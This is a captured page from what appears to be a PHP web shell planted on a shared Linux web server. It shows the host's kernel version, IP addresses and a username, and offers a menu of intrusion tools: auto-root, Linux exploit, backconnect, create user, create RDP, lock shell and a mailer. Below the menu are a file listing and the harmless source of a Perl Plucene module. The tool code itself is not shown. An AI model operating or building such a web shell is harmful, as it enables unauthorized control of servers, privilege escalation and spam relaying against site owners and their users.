Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Plucene /
Index /
[ HOME SHELL ]
Name
Size
Permission
Action
DocumentWriter.pm
4.15
KB
-rw-r--r--
FieldInfos.pm
3.95
KB
-rw-r--r--
FieldsReader.pm
1.83
KB
-rw-r--r--
FieldsWriter.pm
2.79
KB
-rw-r--r--
Reader.pm
4
KB
-rw-r--r--
SegmentInfo.pm
909
B
-rw-r--r--
SegmentInfos.pm
2.42
KB
-rw-r--r--
SegmentMergeInfo.pm
2.49
KB
-rw-r--r--
SegmentMerger.pm
4.58
KB
-rw-r--r--
SegmentReader.pm
6.73
KB
-rw-r--r--
SegmentTermDocs.pm
2.82
KB
-rw-r--r--
SegmentTermEnum.pm
3.16
KB
-rw-r--r--
SegmentTermPositions.pm
2.88
KB
-rw-r--r--
SegmentsReader.pm
6.7
KB
-rw-r--r--
SegmentsTermEnum.pm
1.6
KB
-rw-r--r--
Term.pm
1.45
KB
-rw-r--r--
TermInfo.pm
902
B
-rw-r--r--
TermInfosReader.pm
3.39
KB
-rw-r--r--
TermInfosWriter.pm
3.65
KB
-rw-r--r--
Writer.pm
7.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SegmentInfo.pm
package Plucene::Index::SegmentInfo; =head1 NAME Plucene::Index::SegmentInfo - Information on a Segment =head1 SYNOPSIS my $segment_info = Plucene::Index::SegmentInfo->new; # get my $name = $segment_info->name; my $doc_count = $segment_info->doc_count; my $dir = $segment_info->dir; # set $segment_info->name($new_name); $segment_info->doc_count($new_doc_count); $segment_info->dir($new_dir); =head1 DESCRIPTION This class holds information on a segment. The index database is composed of 'segments' each stored in a separate file. When you add documents to the index, new segments may be created. You can compact the database and reduce the number of segments by optimizing it. =head1 METHODS =cut use strict; use warnings; use base qw(Class::Accessor::Fast); =head2 name / doc_count / dir Get / set these attributes. =cut __PACKAGE__->mk_accessors(qw/name doc_count dir/); 1;
Close